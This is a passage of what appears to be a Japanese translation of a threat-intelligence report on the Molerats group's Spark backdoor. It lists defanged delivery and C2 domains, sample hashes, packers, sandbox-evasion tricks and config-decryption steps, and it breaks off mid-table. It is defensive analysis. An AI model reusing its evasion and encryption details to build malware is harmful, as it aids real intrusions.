1\u30b9\u3092\u30b9\u30ad\u30e3\u30f3\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306b\u3088\u308a\u3001\u6b21\u306e2\u3064\u306e\u8ffd\u52a0\u306eVBS\u30d5\u30a1\u30a4\u30eb\u304c\u767a\u898b\u3055\u308c\u307e\u3057\u305f\u3002SHA256: 85631021d7e84dc466b23cf77dd949ebc61011a52c1f0fb046cfd62dd9192a15\u306f\u3001\u7b2c\u4e00\u6bb5\u968e\u306eVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3092\u8868\u3057\u307e\u3059\u3002\u6b21\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u3053\u308c\u306b\u306f\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30c9\u30e1\u30a4\u30f3\u304a\u3088\u3073\u30d5\u30a1\u30a4\u30eb\u540d\u3078\u306e\u30de\u30a4\u30ca\u30fc\u306a\u5909\u66f4\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">https:\/\/dapoerwedding[.]com\/GoogleChrome.vbs<\/span><\/p>\n<p>\u767a\u898b\u3055\u308c\u305f2\u756a\u76ee\u306eVBS\u30d5\u30a1\u30a4\u30eb(SHA256: 9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7)\u306f\u3001\u6700\u7d42\u306eMSI\u30d5\u30a1\u30a4\u30eb \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u95a2\u3059\u308b\u7b2c\u4e8c\u6bb5\u968e\u306eVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3067\u3059\u3002\u3053\u308c\u306f\u3001\u57f7\u7b46\u6642\u70b9\u3067\u306f\u5165\u624b\u3067\u304d\u306a\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">https:\/\/dapoerwedding[.]com\/GoogleChrome.msi<\/span><\/p>\n<p>\u3055\u3089\u306b\u3001\u5225\u306eAutoFocus\u30af\u30a8\u30ea\u3092\u4f7f\u7528\u3057\u305f\u8ffd\u52a0\u306eWord\u6587\u66f8(\u4e0a\u8a18\u306e\u56f34\u3067\u30aa\u30ec\u30f3\u30b8\u8272\u306e\u30dc\u30c3\u30af\u30b9\u3067\u5f37\u8abf\u8868\u793a\u3055\u308c\u305f\u4ed6\u306e2\u3064\u306eAutoFocus \"AF\")\u3092\u767a\u898b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306eMaltego\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u3067\u306f\u3001\u5143\u306e\u6587\u66f8\u306eVBA\u30de\u30af\u30ed \u30b3\u30fc\u30c9\u304b\u3089\u8a08\u7b97\u3057\u305f\u72ec\u81ea\u306e\u30cf\u30c3\u30b7\u30e5\u3092\u4f7f\u7528\u3057\u3066\u3001\u30c7\u30fc\u30bf\u3092\u30af\u30a8\u30ea\u3057\u307e\u3059\u3002\u305d\u306e\u7d50\u679c\u304c\u3001SHA256: 602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb (servicebios[.]com)\u3001SHA256: a2c68da1b3e0115f5804a55768b2baf50faea81f13a16e563411754dc6c0a8ff\u304a\u3088\u30734f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba (dapoerwedding[.]com)\u3068\u306a\u308a\u307e\u3059\u3002<\/p>\n<p>dapoerwedding[.]com\u304a\u3088\u3073servicebios[.]comMolerats\u306e\u6700\u521d\u306e\u691c\u67fb\u6642\u306b\u306f\u3001\u4ee5\u524d\u6587\u66f8\u5316\u3055\u308c\u305fMolerats\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3068\u306e\u3064\u306a\u304c\u308a\u306f\u78ba\u8a8d\u3055\u308c\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u30012\u3064\u306e\u30c9\u30e1\u30a4\u30f3\u306b\u306f\u6b21\u306b\u793a\u3059\u3044\u304f\u3064\u304b\u306e\u5171\u901a\u70b9(<a href=\"https:\/\/attack.mitre.org\/techniques\/T1347\/\">T1347<\/a>)\u304c\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n<ol>\n<li>\u65e2\u5b58\u306e\u30c9\u30e1\u30a4\u30f3<\/li>\n<li>\u4e00\u898b\u3059\u308b\u3068\u6b63\u898f\u306e\u5c65\u6b74\u30b3\u30f3\u30c6\u30f3\u30c4\u3067\u3042\u308b<\/li>\n<li>\u6700\u8fd1\u671f\u9650\u5207\u308c\u3068\u306a\u3063\u305f(\u30c9\u30e1\u30a4\u30f3\u306e\u511f\u9084\u7336\u4e88\u671f\u9593\u3082\u7d4c\u904e\u3057\u305f)<\/li>\n<li>\u671f\u9650\u5207\u308c\u5f8c\u306e\u767b\u9332\u8005(<a href=\"https:\/\/attack.mitre.org\/techniques\/T1328\/\">T1328<\/a>)\u304cNameCheap, Inc.\u3068\u306a\u3063\u3066\u3044\u308b<\/li>\n<li>Domain Validation(DV)\u306eSSL\u8a3c\u660e\u66f8\u306e\u8a2d\u5b9a(<a href=\"https:\/\/attack.mitre.org\/techniques\/T1337\/\">T1337<\/a>)\u304c\u3001Sectigo\u306b\u3088\u3063\u3066\u767a\u884c\u3055\u308c\u3066\u3044\u308b<\/li>\n<\/ol>\n<p>\u4e0a\u8a18\u306b\u793a\u3057\u305f\u5171\u901a\u70b9\u3092\u6301\u3064\u5225\u306e\u914d\u4fe1\u30c9\u30e1\u30a4\u30f3(zmartco[.]com)\u306f\u3001\u524d\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305f\u88681\u306b\u793a\u3055\u308c\u3066\u3044\u308b\"Pictures.pdf\"\u914d\u4fe1\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u306b\u95a2\u9023\u3057\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-105222-X1c4362e83f28b98f548636673c0ac8be6dd8528\"><\/a>Operation Parliament\u306b\u95a2\u4fc2\u3057\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9<\/h2>\n<p>\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u3001Molerats\u304c\u591a\u304f\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u7528\u3044\u3066\u3044\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002\u3064\u3044\u6700\u8fd1\u307e\u3067\u3001\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u306b\u306f\u72ec\u81ea\u306e\u540d\u524d\u304c\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u3001<a href=\"https:\/\/www.cybereason.com\/blog\/new-cyber-espionage-campaigns-targeting-palestinians-part-one\">\u5148\u65e5\u3001Cybereason\u306b\u3088\u3063\u3066\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u306b\"Spark\"\u3068\u3044\u3046\u540d\u524d\u304c\u4ed8\u3051\u3089\u308c\u307e\u3057\u305f<\/a>\u3002Cybereason\u306e\u30d6\u30ed\u30b0\u3067\u8a00\u53ca\u3055\u308c\u3001<a href=\"https:\/\/ti.360.net\/blog\/articles\/suspected-molerats-new-attack-in-the-middle-east-en\/\">\u5947\u864e360\u306e\u30d6\u30ed\u30b0<\/a>\u3067\u3082\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u3001Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306f2019\u5e741\u6708\u306b\u767a\u751f\u3057\u305f\u653b\u6483\u3067\u3082\u914d\u4fe1\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u5f0a\u793e\u306e\u8abf\u67fb\u306b\u3088\u308b\u3068\u3001Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306f\u30ab\u30b9\u30da\u30eb\u30b9\u30ad\u30fc\u306b\u3088\u3063\u3066\u5831\u544a\u3055\u308c\u305fOperation Parliament\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u4e3b\u8981\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3042\u3063\u305f\u305f\u3081\u3001\u5c11\u306a\u304f\u3068\u30822017\u5e74\u524d\u534a\u304b\u3089\u3001Molerats\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>Spark\u306f\u3001HTTP POST\u8981\u6c42\u3092\u4f7f\u7528\u3057\u3066C2\u30b5\u30fc\u30d0\u30fc\u3068\u901a\u4fe1\u3057\u3066\u3001\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3057\u305f\u308a\u3001\u305d\u306e\u7d50\u679c\u3092\u76d7\u307f\u51fa\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u3059\u3079\u3066\u304cJSON\u69cb\u9020\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u307b\u3068\u3093\u3069\u306e\u5834\u5408\u3001\u653b\u6483\u8005\u306f\u5546\u7528\u30d1\u30c3\u30ab\u30fc\u3092\u4f7f\u7528\u3057\u3066Spark\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u96e3\u8aad\u5316\u3057\u3001\u691c\u51fa\u3092\u56de\u907f\u3057\u307e\u3059\u3002\u8abf\u67fb\u306e\u6bb5\u968e\u3067\u3001\u653b\u6483\u8005\u304cEnigma Protector\u3001Themida\u3001\u304a\u3088\u3073VMProtect\u3092\u4f7f\u7528\u3057\u3066\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u8b58\u5225\u3092\u56f0\u96e3\u306b\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u307e\u305f\u3001\u5f0a\u793e\u3067\u306f\u958b\u767a\u8005\u304c\u30d0\u30a4\u30ca\u30ea\u306b\u6b8b\u3057\u305fSpark\u30d9\u30fc\u30b9\u306e\u8b58\u5225\u5b50\u306e2\u3064\u306e\u7570\u306a\u308b\u30d0\u30fc\u30b8\u30e7\u30f3(2.2\u304a\u3088\u30734.2)\u3092\u7279\u5b9a\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u8b58\u5225\u53ef\u80fd\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u6587\u5b57\u5217\u3092\u6301\u3064Spark\u30b5\u30f3\u30d7\u30eb\u306b\u3088\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u306b\u57fa\u3065\u3044\u3066\u5224\u65ad\u3059\u308b\u3068\u3001\u30d0\u30fc\u30b8\u30e7\u30f32.2\u306f2017\u5e74\u306b\u4f5c\u6210\u3055\u308c\u3001\u30d0\u30fc\u30b8\u30e7\u30f34.2\u306f2019\u5e7412\u6708\u304a\u3088\u30732020\u5e741\u6708\u306b\u4f5c\u6210\u3055\u308c\u305f\u3068\u307f\u3089\u308c\u307e\u3059\u3002\u88682\u306f\u3001\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u3092\u6301\u3064\u3053\u308c\u3089\u306eSpark\u30b5\u30f3\u30d7\u30eb\u3092\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u304a\u3088\u3073\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u96e3\u8aad\u5316\u306b\u4f7f\u7528\u3055\u308c\u305f\u30d1\u30c3\u30ab\u30fc\u3068\u3068\u3082\u306b\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u5207\u308a\u6368\u3066\u3089\u308c\u305fSHA256<\/strong><\/td>\n<td><strong>\u30d0\u30fc\u30b8\u30e7\u30f3<\/strong><\/td>\n<td><strong>\u30b3\u30f3\u30d1\u30a4\u30eb\u65e5<\/strong><\/td>\n<td><strong>\u30d1\u30c3\u30ab\u30fc<\/strong><\/td>\n<\/tr>\n<tr>\n<td>966ad6452793b15..<\/td>\n<td>2.2<\/td>\n<td>2017-05-24 6:15:04<\/td>\n<td>VMProtect<\/td>\n<\/tr>\n<tr>\n<td>ab4e43b4e526d44..<\/td>\n<td>2.2<\/td>\n<td>2017-05-24 6:15:04<\/td>\n<td>VMProtect<\/td>\n<\/tr>\n<tr>\n<td>212aa6e3f236550..<\/td>\n<td>2.2<\/td>\n<td>2017-05-24 6:15:04<\/td>\n<td>VMProtect<\/td>\n<\/tr>\n<tr>\n<td>cf32479ed30ae95..<\/td>\n<td>4.2<\/td>\n<td>2019-12-30 9:45:44<\/td>\n<td>\u306a\u3057<\/td>\n<\/tr>\n<tr>\n<td>d0dc1de0ae912c7..<\/td>\n<td>4.2<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>Enigma<\/td>\n<\/tr>\n<tr>\n<td>04fa6aaea5e3a26..<\/td>\n<td>4.2<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>Enigma<\/td>\n<\/tr>\n<tr>\n<td>6e60f5c65299ee7..<\/td>\n<td>4.2<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>Enigma<\/td>\n<\/tr>\n<tr>\n<td>b08b8fddb9dd940..<\/td>\n<td>4.2<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>Enigma<\/td>\n<\/tr>\n<tr>\n<td>64ea1f1e0352f3d..<\/td>\n<td>4.2<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>Enigma<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88682. Spark\u30b5\u30f3\u30d7\u30eb\u3068\u305d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u3001\u304a\u3088\u3073\u4f7f\u7528\u3055\u308c\u305f\u30d1\u30c3\u30ab\u30fc<\/em><\/span><\/p>\n<p>\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u304c2017\u5e743\u6708\u304b\u30892020\u5e741\u6708\u306e\u591a\u6570\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5f0a\u793e\u304c\u53ce\u96c6\u3057\u305f\u3068\u3053\u308d\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u304c\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u3092\u7d043\u5e74\u306b\u308f\u305f\u3063\u3066\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u4f7f\u7528\u3057\u3066\u304d\u305f\u3053\u3068\u304c\u793a\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u5404\u30d5\u30a1\u30a4\u30eb\u304b\u3089\u69cb\u6210\u3092\u5c55\u958b\u3057\u3001Spark\u306b\u95a2\u9023\u3057\u305f\u65e2\u77e5\u306eC2\u30c9\u30e1\u30a4\u30f3\u3092\u96c6\u3081\u3001\u88683\u306b\u307e\u3068\u3081\u307e\u3057\u305f\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u30c9\u30e1\u30a4\u30f3<\/strong><\/td>\n<td><strong>\u6700\u521d\u306e\u4f7f\u7528<\/strong><\/td>\n<\/tr>\n<tr>\n<td>webtutorialz[.]com<\/td>\n<td>2020\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>nysura[.]com<\/td>\n<td>2020\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>laceibagrafica[.]com<\/td>\n<td>2019\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>motoqu[.]com<\/td>\n<td>2019\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>smartweb9[.]com<\/td>\n<td>2019\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>laptower[.]com<\/td>\n<td>2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>app.msexchanges16[.]com<\/td>\n<td>2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>msexchange13[.]com<\/td>\n<td>2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>cloudserviceapi[.]online<\/td>\n<td>2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>updates.masterservices[.]online<\/td>\n<td>2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>clients.itresolver[.]online<\/td>\n<td>2018\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>update.itresolver[.]online<\/td>\n<td>2018\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>91.219.237[.]99<\/td>\n<td>2017\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>goldenlines[.]site<\/td>\n<td>2017\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<tr>\n<td>update.nextdata[.]site<\/td>\n<td>2017\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88683. Spark C2\u30c9\u30e1\u30a4\u30f3\u304a\u3088\u3073\u3053\u308c\u3089\u304c\u4f7f\u7528\u3055\u308c\u305f\u304a\u304a\u3088\u305d\u306e\u6642\u671f<\/em><\/span><\/p>\n<p>\u6b21\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001Spark\u306e\u6a5f\u80fd\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u30012019\u5e7411\u6708\u306e\u653b\u6483\u3067Pictures.pdf\u6587\u66f8\u306b\u3088\u3063\u3066\u914d\u4fe1\u3055\u308c\u305f\"pdf.exe\"\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5206\u6790\u304b\u3089\u5224\u5b9a\u3055\u308c\u305fC2\u30c1\u30e3\u30cd\u30eb\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-105222-X67cc1b9b01b04ff283eec8dd45e586afae69467\"><\/a>2019\u5e7411\u6708\u306e\u653b\u6483\u306b\u304a\u3051\u308bPictures.pdf\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9<\/h2>\n<p>\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u5546\u7528\u306e<a href=\"https:\/\/enigmaprotector.com\/\">Enigma Protector<\/a> (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1045\/\">T1045<\/a>)\u3067\u30d1\u30c3\u30af\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30d1\u30c3\u30af\u3059\u308b\u969b\u3001Enigma Protector\u5185\u306e<a href=\"https:\/\/enigmaprotector.com\/en\/help\/manual\/3fb53859f328dbe43332a934a9054fd1\">\"\u30b9\u30d7\u30e9\u30c3\u30b7\u30e5\u753b\u9762\"<\/a>\u3068\u547c\u3070\u308c\u308b\u6a5f\u80fd\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u3001\u3059\u3079\u3066\u306e\u30a6\u30a3\u30f3\u30c9\u30a6\u306e\u4e0a\u90e8\u306b\u753b\u50cf\u3092\u8868\u793a\u3059\u308b\u3088\u3046\u69cb\u6210\u3057\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u753b\u50cf\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u307e\u3067\u5f85\u6a5f\u3057\u3066\u304b\u3089\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u56f35\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5b9f\u884c\u3059\u308b\u524d\u306bEnigma Protector\u306b\u3088\u3063\u3066\u8868\u793a\u3055\u308c\u305f\u30b9\u30d7\u30e9\u30c3\u30b7\u30e5\u753b\u50cf\u3067\u3059\u304c\u3001\u3053\u306e\u753b\u50cf\u306f<a href=\"https:\/\/wallpaperswide.com\/windows_10_hero_4k-wallpapers.html\">wallpaperswide.com\u304b\u3089\u5165\u624b\u3067\u304d\u308b<\/a>\u58c1\u7d19\u3067\u3059\u3002\u30b9\u30d7\u30e9\u30c3\u30b7\u30e5\u753b\u9762\u6a5f\u80fd\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u308b\u524d\u306b\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u753b\u9762\u306e\u30af\u30ea\u30c3\u30af\u3068\u3044\u3046\u64cd\u4f5c\u304c\u5fc5\u8981\u3068\u306a\u308b\u305f\u3081\u3001\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306e\u56de\u907f\u624b\u6cd5\u3068\u3057\u3066\u6a5f\u80fd\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"2500\" height=\"1501\"  class=\"wp-image-105233 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-5-screenshot-of-the-contents-of-the-malici.png\" alt=\"Figure 5. Screenshot of the contents of the malicious PDF document\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f35. \u60aa\u610f\u306e\u3042\u308bPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8<\/span><\/p>\n<p>\u30a2\u30f3\u30d1\u30c3\u30af\u5f8c\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u6a5f\u80fd\u9762\u3067Operation Parliament\u3067\u914d\u4fe1\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u985e\u4f3c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002Spark\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u653b\u6483\u8005\u304c\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u3067\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u958b\u3044\u3066\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002<\/p>\n<p>\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u306f\u3001\u6700\u521d\u306bGetKeyboardLayoutList\u306e\u7d50\u679c\u3068GetLocaleInfoA\u304b\u3089\u8fd4\u3055\u308c\u308b\u8a00\u8a9e\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3066\u3001\"arabic\"\u3068\u3044\u3046\u5358\u8a9e\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u3053\u308c\u30892\u3064\u306eAPI\u30b3\u30fc\u30eb\u306e\u7d50\u679c\u306b\u3053\u306e\u5358\u8a9e\u304c\u898b\u3064\u304b\u3089\u306a\u304b\u3063\u305f\u5834\u5408\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3057\u307e\u305b\u3093\u3002\u7279\u5b9a\u306e\u30ad\u30fc\u30dc\u30fc\u30c9\u3068\u8a00\u8a9e\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u306e\u306f\u3001\u653b\u6483\u8005\u306e\u6a19\u7684\u3068\u306a\u308b\u88ab\u5bb3\u7aef\u672b\u306b\u306f\u3053\u306e\u69cb\u6210\u304c\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3067\u3001\u3053\u306e\u69cb\u6210\u304c\u3055\u308c\u3066\u3044\u306a\u3044\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u3067\u5b9f\u884c\u3055\u308c\u308b\u306e\u3092\u907f\u3051\u308b\u3053\u3068\u3092\u76ee\u7684\u3068\u3057\u305f\u3001\u65e2\u77e5\u306e\u56de\u907f\u6280\u6cd5\u3067\u3059\u3002<\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u653b\u6483\u8005\u306e\u6a19\u7684\u306e\u30b7\u30b9\u30c6\u30e0\u306b\u9069\u5207\u306a\u30ad\u30fc\u30dc\u30fc\u30c9\u3068\u8a00\u8a9e\u30d1\u30c3\u30af\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3059\u308b\u3068\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u5185\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u69cb\u6210\u3067\u6307\u5b9a\u3055\u308c\u305fC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u3092\u8a66\u307f\u307e\u3059\u3002\u57cb\u3081\u8fbc\u307e\u308c\u305f\u69cb\u6210\u306f\u6697\u53f7\u5316\u3055\u308c\u3066\u304a\u308a\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6700\u521d\u306b\u30ab\u30b9\u30bf\u30e0\u306erolling XOR\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3053\u308c\u3092\u5fa9\u53f7\u3057\u3001\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306e\u30ad\u30fc\u304a\u3088\u3073\u30d0\u30c3\u30d5\u30a1\u3092\u5fa9\u53f7\u3057\u307e\u3059\u3002\u305d\u306e\u7d50\u679c\u3001base64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u3068\u307f\u3089\u308c\u308b\u30ad\u30fc\u304a\u3088\u3073\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30ad\u30fc\u306eSHA256\u30cf\u30c3\u30b7\u30e5\u304c\u751f\u6210\u3055\u308c\u3001\u7d50\u679c\u306e\u30cf\u30c3\u30b7\u30e5\u306e4\u756a\u76ee\u304b\u308928\u756a\u76ee\u306e\u30d0\u30a4\u30c8\u304c\u6700\u7d42\u30ad\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30c8\u30ea\u30d7\u30ebDES (3DES)\u3092\u4f7f\u7528\u3057\u3066\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092base64\u30c7\u30b3\u30fc\u30c9\u3057\u3001\u6700\u7d42\u30ad\u30fc\u3092\u4f7f\u7528\u3057\u3066\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092\u5fa9\u53f7\u3057\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001JSON\u3067\u69cb\u9020\u5316\u3055\u308c\u305f\u69cb\u6210\u304c\u751f\u3058\u307e\u3059\u3002\u3053\u306e\u7279\u7570\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306f\u3001\u4ee5\u4e0b\u306e\u88683\u306b\u793a\u3059\u30ad\u30fc\u3068\u5024\u304c\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>JSON\u30d5\u30a3\u30fc\u30eb\u30c9<\/strong><\/td>\n<td><strong>JSON\u5024<\/strong><\/td>\n<td><strong>\u8aac\u660e<\/strong><\/td>\n<\/tr>\n<tr>\n<td>xBql<\/td>\n<td>laceibagrafica[.]com<\/td>\n<td>C2\u30b5\u30fc\u30d0\u30fc\u306e\u30db\u30b9\u30c8\u540d<\/td>\n<\/tr>\n<tr>\n<td>eauy<\/td>\n<td>\/<\/td>\n<td>C2\u30b5\u30fc\u30d0\u30fc\u306eURI<\/td>\n<\/tr>\n<tr>\n<td>Qnd<\/td>\n<td>80<\/td>\n<td>C2\u30b5\u30fc\u30d0\u30fc\u306eTCP\u30dd\u30fc\u30c8<\/td>\n<\/tr>\n<tr>\n<td>jJN<\/td>\n<td>0<